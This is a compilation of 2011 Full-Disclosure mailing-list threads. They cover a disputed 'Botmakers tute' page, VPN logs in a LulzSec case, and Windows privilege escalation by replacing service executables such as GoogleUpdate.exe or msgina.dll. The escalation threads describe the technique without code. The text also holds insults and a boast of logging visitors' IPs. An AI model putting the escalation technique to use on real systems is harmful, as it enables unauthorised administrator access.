gawwd, is this how pathetic some people are about some warez... wich is for making some nice tools :) lols.. it is only alittle bit of the magic that i have , why concentrate on wares... ms will annoy me if it is annoying them, am sure of that. i dont put my shit around, for people to use on wares scene, i only allow it for users of the site. So, when my hoster, asks me to remove it, then, i shall ask him for the warrant, if the warrant encapsulates *me* then, i will have no choice but to rm it right ? Until then, i will remove NOTHINg. Move on to, who the hell is this n3td3v , acting like some fed, a fat one to. I was all for the VPN arguenement, funny how this popped up about the website so soon, and so similar like...almost like this topic what it was, right. I waited for someone who acts like authority to showup, n3td3v was the first to enter the honeypot. now, qwho else who fell for it, we can see that, clearly... the smarter people on the list, did not even visit that page :)i saw who exactly visited, and exactly whaere they went, ip/domain and hosting provider to. So, i am saying to n3td3v , Make me fatty. Simple. xd On 3 October 2011 09:55, Jeffrey Walton noloa...@gmail.com wrote: On Sun, Oct 2, 2011 at 6:46 PM, Laurelai Storm laure...@oneechan.org wrote: I don't think they have the authority to seize non us domains owned by people not in the US. DNS is vulnerable to attackers and legislation alike. On Oct 2, 2011 5:44 PM, andrew.wallace andrew.wall...@rocketmail.com wrote: On Sun, Oct 2, 2011 at 11:25 PM, GloW - XD doo...@gmail.com wrote: Yes, it is nice ay :) When M$ asks me to remove it, I shall. cheers. xd It doesn't work that way, your domain will be seized by DHS-ICE. http://www.ice.gov/about/offices/homeland-security-investigations/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
Hey fatty-come-get-me, Guy you do not even read the links you post, http://www.ice.gov/about/offices/homeland-security-investigations/ I have not broken theyre laws atall. I am no terroist :s lol... pls, try harder, this time, try properly. cheers fatty, xd On 3 October 2011 09:55, Jeffrey Walton noloa...@gmail.com wrote: On Sun, Oct 2, 2011 at 6:46 PM, Laurelai Storm laure...@oneechan.org wrote: I don't think they have the authority to seize non us domains owned by people not in the US. DNS is vulnerable to attackers and legislation alike. On Oct 2, 2011 5:44 PM, andrew.wallace andrew.wall...@rocketmail.com wrote: On Sun, Oct 2, 2011 at 11:25 PM, GloW - XD doo...@gmail.com wrote: Yes, it is nice ay :) When M$ asks me to remove it, I shall. cheers. xd It doesn't work that way, your domain will be seized by DHS-ICE. http://www.ice.gov/about/offices/homeland-security-investigations/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/ (fwd)
rofl... i dont commit any online crime, i dont think i am headed anywhere jailish soon :) cheers. xd On 3 October 2011 10:22, valdis.kletni...@vt.edu wrote: Will the person who's headed to jail please have somebody let us know how they're doing? And the rest of you, make note of what n3td3v classifies as threatening him and act accordingly. -- Forwarded message -- From: andrew.wallace andrew.wall...@rocketmail.com To: valdis.kletni...@vt.edu valdis.kletni...@vt.edu Date: Sun, 02 Oct 2011 15:09:49 -0700 (PDT) Subject: Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/ On Sun, Oct 2, 2011 at 10:51 PM, valdis.kletni...@vt.edu wrote: On Sun, 02 Oct 2011 12:11:41 MDT, SanguineRose said: This is hot :) I rather enjoy a good epeen sizing contest And enough people will do a 'reply all' to n3td3v's postings that the fact he can't post to this list directly won't matter. Sadly crazy coder is on his way to jail for threatening me and of course the Microsoft piracy, bot net herding thing doesn't help. Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
Hello, hehe thankyou but, it is merely something i wanted todo for seeing alittle more about the online state-of-mind about the whole being arrested, and to what degree it would take.. etc... I think i do know where i stand, and, not being a criminal, am not headed anywhre cept my bed, tonight. Anyhow, I hope people are observing things... anyone who is interested in prvacy... etc. and yes, ofc i would never keep pages like this up for public, heck i even linked it to my main blog... i mean, i named it Botmakers tute , lol... clearly people who would have seen this, would have known what i was doing exactly. It is sofar amusing this even took off as a topic tho, I am kinda laugjhing coz, there is no PoC even connected here, no exploit, nothing but 'talk', heresay, and some files on a site :s , i doubt i wuld be targetted for prison, when i aint committed a crime. It is a good lesson indeed, I have said it all along, it is to victim-impact, is always what is gonna problemate things, and ofcourse the *real* press, politics and press. It is what drives every cyber arrest sofar..maybe not torrent sites i guess they are targetted because of alot of reasons, Riaa and, they still stay online and, i can still d/l any torrentfile wich works from TPB,wich was even taken thru court :s... It just is that, why lock someone up for a cpl of files, when the network is crawling with deeper, nastier people and those are definately going to be targetted.. I would also, never condone in porn online, i do have a partner so im biased against it abit, but, it is what gets alot of people in trouble also :s Just, simply, do not shoot people, maybe dont start leaking 'governemt' documentation and, even then, it is murky area to be in even then because of countrys simply not comlying with some things, or laws, or what thhey may see as 'free' speech. enjoy, xd On 3 October 2011 10:25, Richard Golodner rgolod...@infratection.comwrote: On Mon, 2011-10-03 at 10:02 +1100, GloW - XD wrote: the smarter people on the list, did not even visit that page I did try to look at your top level page and the connection timed out, clearly you know your shit. I enjoy your posts and your sense of humor, M$, no shit. You be cool, Richard ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
a legit key for the stuff.. and, the iso for sdk, is online, on a ms link, it is called free. So, i dont know but, people have to really think, where do they want theyre money spent, when they spend it, on police worrying about wares, or, police worrying about theyre childrens safety online,. Ask yourself this, then reply. Thankyou. (Apologies for any speeling errors,I need a good plugin to correct those but, it is simply pressures of work also, and trying to put a half-decent post online...) again, i will try and make this abit neater...but it is, time restarints. cheers! xd On 3 October 2011 11:48, Richard Golodner rgolod...@infratection.comwrote: On Mon, 2011-10-03 at 11:00 +1100, GloW - XD wrote: It is sofar amusing this even took off as a topic tho, XD, anything that has n3td3v in it is going to draw attention as he pissed people off on many lists. The coolest thing is your social-state of mind experiment. I am not sure, nor want to know where you are located, but I am amazed at the decline of intellect here in America. You can probably verify this by your own logs, you just don't get to see the guy in the Harley tank-top tee shirt with a beer in one hand and his mouse in the other trying to play XSS with your web pages. Trust me, some of them look like that. From your posts I can tell you are a bright gentlemen and an asset to the community of FD. It is my pleasure to be able to write you and I wish you success in your career. I am an old man (48) and can see the difference between the cream and the crap. With a varied career in the intelligence industry I can assure you that you have nothing to worry about police/legal wise. There is much heavier shit going in the world besides what that douche bag accused you of and what M$ would do. You are safe and those other guys/gals (Lorelei?) can fuck off! Keep on doing what you do as it is definitely appreciated by me. I am sure Valdis digs it too, but I have not spoken to the man in a while. Be cool, Richard ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
I hardly use google on my own site... i did once tho, and, i did not see that, but, now it seems to be a problem i think, or, i am taking your word that it is now cached, well, that took them a whole of, 2days. Nice work,. They know where traffic going, and are making sure they make money off things like that... i guess. Another interesting area...because they actually make backups of files to... sheesh, have they already cached it :s hrm... lol...well, that was VERY fast then, considering i linked to it only a cpl days ago :s from the files, and page itself, i meant, that was there for my own backups for how i like my VS setup, it just seems to be a great tute for compiling any .cpp or .c file on windows env... i guess i should maybe take it down now eh.. i have prooved what i wanted.. did not think google would cache that... dont look on google atall, n, not for my own site :s but, i will b sure to try and fix it anyhow, or just delink that page :s it is no bother now, i did what was intended... the page is no longer needed. Anyhow, cheers for pointing that out. xd On 3 October 2011 12:02, valdis.kletni...@vt.edu wrote: On Mon, 03 Oct 2011 11:00:55 +1100, you said: prvacy... etc. and yes, ofc i would never keep pages like this up for public, heck i even linked it to my main blog. Wouldn't keep it up for the public? Have you looked to see if Google has cached your site yet? ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member
in Russia, they are required by federal law to hand over your details wherever you may reside. I dont know where you've obtained this idea that they can't. Just because something is advertised as 'anonymous' doesnt mean it's 'so anonymous you can break the law' and anyone using a EU/US-related country to do this is either stupid or naive. On Thu, Sep 29, 2011 at 1:50 PM, xD 0x41 sec...@gmail.com wrote: They advertised as anonymous VPN to 'everyone'. Then, that would mean, especially NOT locally, thats something wich is also, subject to federal laws though so, in its own country, the provider may have to, nomatter whats advertised, BUT outside of country customers, should not be handed over. isp's here dont do it, and havent, for like 20 yrs, they also do not take down people,issue nor execute other peoples 'takedown orders', there is many reasons for this but basically, they loose money from it. Anyhow, in UK, you maybe right, but outside of there, then, they should have maybe not advertised as anononymous vpn services for everyone and anyone. thats obvious crap we know now. anyhow, cheers, xd On 29 September 2011 22:45, Benji m...@b3nji.com wrote: Im sorry, why is it 'worrying' that a vpn provider that was a UK business and was located in the UK, is subject to UK law? On Thu, Sep 29, 2011 at 9:51 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Again, I hope this does not fail to send. The reasoning behind the Pure Elite recruitment channel was A: to recruit some talented people (and, by all accounts, there were some talented programmers there) and B: development and idle talk. Now more interesting was the reasoning behind the name - by putting the developers and coders and potential recruits in a channel named Pure Elite, it was essentially an ego boost for the new guys, made them feel valued, etc, when in fact most were but pawns to be used (IMHO). This co-operation between VPN providers and LEO, while being nothing new - remember how hushmail caved in - is indeed worrying for those of us who are privacy advocates as well as security researchers. On a more direct note, Laurelei, do not presume that you know all there is to know about them. Doing so would be foolish. (Now don't go assuming that I hate you, I bear you bugger all ill-will, etc). Good day. On Wed, Sep 28, 2011 at 5:44 AM, Laurelai Storm laure...@oneechan.org wrote: Its all good dude. What really concerns me is that vpn providers might give over logs to oppressive regemes. TOR is starting to look better and better. On Sep 27, 2011 11:40 PM, GloW - XD doo...@gmail.com wrote: never did... was only for one buttcheek kid that i was alittle pissed and thinking things wich, prolly were wrong at the time... I am adult enough to apologise for what happened back then, and hopefully it is just, cool. :) cheers, your loved by many, you just have many trollers to :sp take care , xd On 28 September 2011 14:32, Laurelai Storm laure...@oneechan.org wrote: Im suprised, someone on the internet who *doesn't * hate me :p On Sep 27, 2011 11:29 PM, GloW - XD doo...@gmail.com wrote: Hello Laurelai , Oh i agree it is still a terrible precedent to be set.. I dont even know where, legally, i stand anymore... It is rather disturbing, nomatter WHO it was laurela. I am all for the hatred against the VPN provs, and this is not just happening here, and i made a BIG statement about this, and privacy, in my channel on efnet, first as i saw it. Then saw a torrentfreak feed,of someone who was an owner of a huge torrent site, was handed to authorities, not by the hoster, no... but by the frigging payment handler, ie paypal or alertpay most likely. This is not good, it makes a grey could now over what is 'anon' and what isnt. and thats a bad thing for us all. To much fraud is causing this, thats plain and simple.Abusing places like Sony, and, major banks, only make the authorities turn to politics, whom in turn can bully with federal and state laws of ANY country, i think this is the dangerous part wich is affecting lulzsec members or whoever was apart of it, and, i mean efnet is no recruiting grounds for decent hkrs. Simple as that, you know it, maybe thru word of mouth ok, but not alone by being in channels but that network, is one federal hideout now..and, that is every channel, if it is not being spied (yea they have a module m_spychannel.c or similar, wich, they actually had without realising, asked a friend, to code for them. This was rejected by me/her,but i believe they have the module running now. So, what was to stop them adding theyre own hidden spy mode to it :s look at what they did to my old channel
Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member
#pure-elite , rofl... yes indeed :P hehe... nice story tho...funny about the elite channel thing... why do ppl tag themselves as elite? usually when they are not... ohwell, thats efnut :s (irc sucks) xd On 27 September 2011 19:03, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Hope this sends correctly, new email client and all... But seeing as it is an international investigation many people have been bending over backwards to assist LEO on this. HMA and perfect privacy were the VPN's of choice for them it would appear, oh, and he was part of the #pure-elite channel on that IRC server, and hence, considered by LEO and others as Part of LulzSec. TL;DR, this is nothing new. On Tue, Sep 27, 2011 at 6:53 AM, Laurelai Storm laure...@oneechan.orgwrote: And the guy wasnt even a part of lulzsec On Sep 26, 2011 10:37 PM, Jeffrey Walton noloa...@gmail.com wrote: On Mon, Sep 26, 2011 at 8:47 PM, Ivan . ivan...@gmail.com wrote: http://www.h-online.com/security/news/item/VPN-provider-helped-track-down-alleged-LulzSec-member-1349666.html Though HMA claims they complied with a court order, it looks as if they facilitated a law enforcement request. The US and the FBI have no jurisdiction in the UK. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member
Hello Laurelai , Oh i agree it is still a terrible precedent to be set.. I dont even know where, legally, i stand anymore... It is rather disturbing, nomatter WHO it was laurela. I am all for the hatred against the VPN provs, and this is not just happening here, and i made a BIG statement about this, and privacy, in my channel on efnet, first as i saw it. Then saw a torrentfreak feed,of someone who was an owner of a huge torrent site, was handed to authorities, not by the hoster, no... but by the frigging payment handler, ie paypal or alertpay most likely. This is not good, it makes a grey could now over what is 'anon' and what isnt. and thats a bad thing for us all. To much fraud is causing this, thats plain and simple.Abusing places like Sony, and, major banks, only make the authorities turn to politics, whom in turn can bully with federal and state laws of ANY country, i think this is the dangerous part wich is affecting lulzsec members or whoever was apart of it, and, i mean efnet is no recruiting grounds for decent hkrs. Simple as that, you know it, maybe thru word of mouth ok, but not alone by being in channels but that network, is one federal hideout now..and, that is every channel, if it is not being spied (yea they have a module m_spychannel.c or similar, wich, they actually had without realising, asked a friend, to code for them. This was rejected by me/her,but i believe they have the module running now. So, what was to stop them adding theyre own hidden spy mode to it :s look at what they did to my old channel #haqnet, they introduced drinemon and a bunch of other things, when it could have been simply worked out with words.. but anyhow, i will not brood on the past, i hope this is mutual Laurelai, I have nothing bad to say about you, and in turn, expect the same. Respect for respect dear. I do agree with you about the situation and, as you can see, am not holding 9undisclosed) crappy things wich happened along time ago, over one idiotic kid, on efnet, whom now i know you do not associate with. So, i want that, to be laid rest now.. please. And, we can only hope that the greater common sense will prevail and hopefully, places will be forced to proove anonymity in some way, wether that be by showing people email interaction with requester's of peoples info, or anything simple even, wich would be then a standard for VPN, I do not use them but, if i bought anonymous vpn, id expect exactly that,without political interaction and grey areas about who and what is now legal and not legal on the internet, on chatrooms, and on even websites. ok, thats plenty, cheers! xd On 28 September 2011 13:41, Laurelai laure...@oneechan.org wrote: On 9/27/2011 10:10 PM, sandeep k wrote: Lolz members was really insane ,i m not why to use that crapy hma. On Sep 27, 2011 8:36 PM, Ferenc Kovacs tyr...@gmail.com wrote: yeah, and usually the same goes for calling others kids ;) On Tue, Sep 27, 2011 at 10:30 PM, GloW - XD doo...@gmail.com wrote: #pure-elite , rofl... yes indeed :P hehe... nice story tho...funny about the elite channel thing... why do ppl tag themselves as elite? usually when they are not... ohwell, thats efnut :s (irc sucks) xd On 27 September 2011 19:03, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Hope this sends correctly, new email client and all... But seeing as it is an international investigation many people have been bending over backwards to assist LEO on this. HMA and perfect privacy were the VPN's of choice for them it would appear, oh, and he was part of the #pure-elite channel on that IRC server, and hence, considered by LEO and others as Part of LulzSec. TL;DR, this is nothing new. On Tue, Sep 27, 2011 at 6:53 AM, Laurelai Storm laure...@oneechan.org wrote: And the guy wasnt even a part of lulzsec On Sep 26, 2011 10:37 PM, Jeffrey Walton noloa...@gmail.com wrote: On Mon, Sep 26, 2011 at 8:47 PM, Ivan . ivan...@gmail.com wrote: http://www.h-online.com/security/news/item/VPN-provider-helped-track-down-alleged-LulzSec-member-1349666.html Though HMA claims they complied with a court order, it looks as if they facilitated a law enforcement request. The US and the FBI have no jurisdiction in the UK. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com
Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member
never did... was only for one buttcheek kid that i was alittle pissed and thinking things wich, prolly were wrong at the time... I am adult enough to apologise for what happened back then, and hopefully it is just, cool. :) cheers, your loved by many, you just have many trollers to :sp take care , xd On 28 September 2011 14:32, Laurelai Storm laure...@oneechan.org wrote: Im suprised, someone on the internet who *doesn't * hate me :p On Sep 27, 2011 11:29 PM, GloW - XD doo...@gmail.com wrote: Hello Laurelai , Oh i agree it is still a terrible precedent to be set.. I dont even know where, legally, i stand anymore... It is rather disturbing, nomatter WHO it was laurela. I am all for the hatred against the VPN provs, and this is not just happening here, and i made a BIG statement about this, and privacy, in my channel on efnet, first as i saw it. Then saw a torrentfreak feed,of someone who was an owner of a huge torrent site, was handed to authorities, not by the hoster, no... but by the frigging payment handler, ie paypal or alertpay most likely. This is not good, it makes a grey could now over what is 'anon' and what isnt. and thats a bad thing for us all. To much fraud is causing this, thats plain and simple.Abusing places like Sony, and, major banks, only make the authorities turn to politics, whom in turn can bully with federal and state laws of ANY country, i think this is the dangerous part wich is affecting lulzsec members or whoever was apart of it, and, i mean efnet is no recruiting grounds for decent hkrs. Simple as that, you know it, maybe thru word of mouth ok, but not alone by being in channels but that network, is one federal hideout now..and, that is every channel, if it is not being spied (yea they have a module m_spychannel.c or similar, wich, they actually had without realising, asked a friend, to code for them. This was rejected by me/her,but i believe they have the module running now. So, what was to stop them adding theyre own hidden spy mode to it :s look at what they did to my old channel #haqnet, they introduced drinemon and a bunch of other things, when it could have been simply worked out with words.. but anyhow, i will not brood on the past, i hope this is mutual Laurelai, I have nothing bad to say about you, and in turn, expect the same. Respect for respect dear. I do agree with you about the situation and, as you can see, am not holding 9undisclosed) crappy things wich happened along time ago, over one idiotic kid, on efnet, whom now i know you do not associate with. So, i want that, to be laid rest now.. please. And, we can only hope that the greater common sense will prevail and hopefully, places will be forced to proove anonymity in some way, wether that be by showing people email interaction with requester's of peoples info, or anything simple even, wich would be then a standard for VPN, I do not use them but, if i bought anonymous vpn, id expect exactly that,without political interaction and grey areas about who and what is now legal and not legal on the internet, on chatrooms, and on even websites. ok, thats plenty, cheers! xd On 28 September 2011 13:41, Laurelai laure...@oneechan.org wrote: On 9/27/2011 10:10 PM, sandeep k wrote: Lolz members was really insane ,i m not why to use that crapy hma. On Sep 27, 2011 8:36 PM, Ferenc Kovacs tyr...@gmail.com wrote: yeah, and usually the same goes for calling others kids ;) On Tue, Sep 27, 2011 at 10:30 PM, GloW - XD doo...@gmail.com wrote: #pure-elite , rofl... yes indeed :P hehe... nice story tho...funny about the elite channel thing... why do ppl tag themselves as elite? usually when they are not... ohwell, thats efnut :s (irc sucks) xd On 27 September 2011 19:03, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Hope this sends correctly, new email client and all... But seeing as it is an international investigation many people have been bending over backwards to assist LEO on this. HMA and perfect privacy were the VPN's of choice for them it would appear, oh, and he was part of the #pure-elite channel on that IRC server, and hence, considered by LEO and others as Part of LulzSec. TL;DR, this is nothing new. On Tue, Sep 27, 2011 at 6:53 AM, Laurelai Storm laure...@oneechan.org wrote: And the guy wasnt even a part of lulzsec On Sep 26, 2011 10:37 PM, Jeffrey Walton noloa...@gmail.com wrote: On Mon, Sep 26, 2011 at 8:47 PM, Ivan . ivan...@gmail.com wrote: http://www.h-online.com/security/news/item/VPN-provider-helped-track-down-alleged-LulzSec-member-1349666.html Though HMA claims they complied with a court order, it looks as if they facilitated a law enforcement request. The US and the FBI have no jurisdiction in the UK. Jeff
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
Good luck with that... you might want to look into msgina.dll , try replace that ;) have phun xd On 26 September 2011 10:29, Travis Biehn tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: full-disclosure-boun...@lists.grok.org.uk To: security-bas...@securityfocus.com To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Sent from my POS BlackBerry wireless device, which may wipe itself at any moment ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Twitter https://twitter.com/tbiehn | LinkedInhttp://www.linkedin.com/in/travisbiehn| GitHub http://github.com/tbiehn | TravisBiehn.comhttp://www.travisbiehn.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting
Haha , too good and too true thor ! Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! Rofl x10. Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006. Anyhow it has been a pleasure, ending this BS i think once and for all, lookup how winlogon works for one thing, then look at how windows creates and maintains a service_table, and then at the dlls, wich are protected ofc, you cannot touch msgina.dll,without ALOT of help from a rootkit or something similar, in wich case, why would you need to ? You could add an admin, hidden, and in simple batfile script (yes i do have my own code but no it is not for kids..), this is 10seconds and hidden, so when you have gotten that far, why would you bother to hijack a dll ? You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and total axcs to all sockets, meaning, all pipe control and thats where half of windows exchanges smb shares for one thing, you guys dont seem to know CRAP about windows to start with, then have the gall to raise such a frigging ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this being useful, or, even just working, and i would look but, you wont, cannot, and will never be able to, especially on newer systems of windows7-8. As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it, and whatever patches they instilled, dont touch even service_table.. so, they have not given it a high prio,and why shuld they. This is simply a case of a secteam gaining notoriety, to try and make this a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont believe in many things MS, I know windows system, and how to break it, better than many people, and i can tell you now, this whole DLL hijack, is a complete and utter waste of your times. But... keep on going, maybe MS will send you another 'thankyou' email ;) xd / crazycoders.com / #haxnet@Ef On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.comwrote: Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: full-disclosure-boun...@lists.grok.org.uk full-disclosure-boun...@lists.grok.org.uk To: security-bas...@securityfocus.comsecurity-bas...@securityfocus.com To: full-disclosure@lists.grok.org.ukfull-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ Sent from my POS BlackBerry wireless device, which may wipe itself at any moment ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ -- Twitter https://twitter.com/tbiehn | LinkedInhttp://www.linkedin.com/in/travisbiehn| GitHub http://github.com/tbiehn | http://www.travisbiehn.com TravisBiehn.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting
Hrmm that sounds abit to good to be true :P id love to see what it involves...ie, the PoC.. and, i dont use googleupdate,so,why would this affect non chrome users.. i dunno.. still seems like not enough there to convince me yet, sorry. xd On 26 September 2011 11:18, Madhur Ahuja ahuja.mad...@gmail.com wrote: I havn't sent this email without doing a Proof of concept. It actually works with *Google Update Service*. The restricted user can replace GoogleUpdate.exe to execute malicious code. This service is installed by any of Google component such as Picasa, Google Talk etc. http://www.google.com/support/installer/bin/answer.py?answer=98805 Madhur On Monday, September 26, 2011, GloW - XD wrote: Haha , too good and too true thor ! Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! Rofl x10. Agreed , this kind of attack, is NOT deasible in 2011, try maybe, 2006. Anyhow it has been a pleasure, ending this BS i think once and for all, lookup how winlogon works for one thing, then look at how windows creates and maintains a service_table, and then at the dlls, wich are protected ofc, you cannot touch msgina.dll,without ALOT of help from a rootkit or something similar, in wich case, why would you need to ? You could add an admin, hidden, and in simple batfile script (yes i do have my own code but no it is not for kids..), this is 10seconds and hidden, so when you have gotten that far, why would you bother to hijack a dll ? You CANNOT do crap,without complete ADMIN not SYSTEm, ADMIN$ share, and total axcs to all sockets, meaning, all pipe control and thats where half of windows exchanges smb shares for one thing, you guys dont seem to know CRAP about windows to start with, then have the gall to raise such a frigging ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this being useful, or, even just working, and i would look but, you wont, cannot, and will never be able to, especially on newer systems of windows7-8. As i said earlier, enjoy your bs DFLL hijacking, but ms, dont care for it, and whatever patches they instilled, dont touch even service_table.. so, they have not given it a high prio,and why shuld they. This is simply a case of a secteam gaining notoriety, to try and make this a 'big bug!!' , to try and gain brownie points from MS. Even tho, i dont believe in many things MS, I know windows system, and how to break it, better than many people, and i can tell you now, this whole DLL hijack, is a complete and utter waste of your times. But... keep on going, maybe MS will send you another 'thankyou' email ;) xd / crazycoders.com / #haxnet@Ef On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.comwrote: Maybe he can trick the user into installing on a FAT32 partition first, and THEN get the to execute from a remote share! On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote: It might be a fun experiment to see what DLLs they're looking for :.) -Travis On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote: To replace a service executable you usually need administrator access anyway. --Original Message-- From: Madhur Ahuja Sender: full-disclosure-boun...@lists.grok.org.uk To: security-bas...@securityfocus.com To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting Sent: 25 Sep 2011 19:31 Imagine a situation where I have a Windows system with the restricted user access and want to get the Administrator access. There are many services in Windows which run with SYSTEM account. If there exists even one such service whose executable is not protected by Windows File Protection, isn't it possible to execute malicious code (such as gaining Administrator access) simply by replacing the service executable with malicious one and then restarting the service. As a restricted user, what's stopping me to do this ? Is there any integrity check performed by services.msc or service itself before executing with SYSTEM account ? Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ Sent from my POS BlackBerry wireless device, which may wipe itself at any moment ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ -- Twitter https://twitter.com/tbiehn | LinkedInhttp://www.linkedin.com/in/travisbiehn| GitHub http://github.com/tbiehn | http://www.travisbiehn.com
Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting
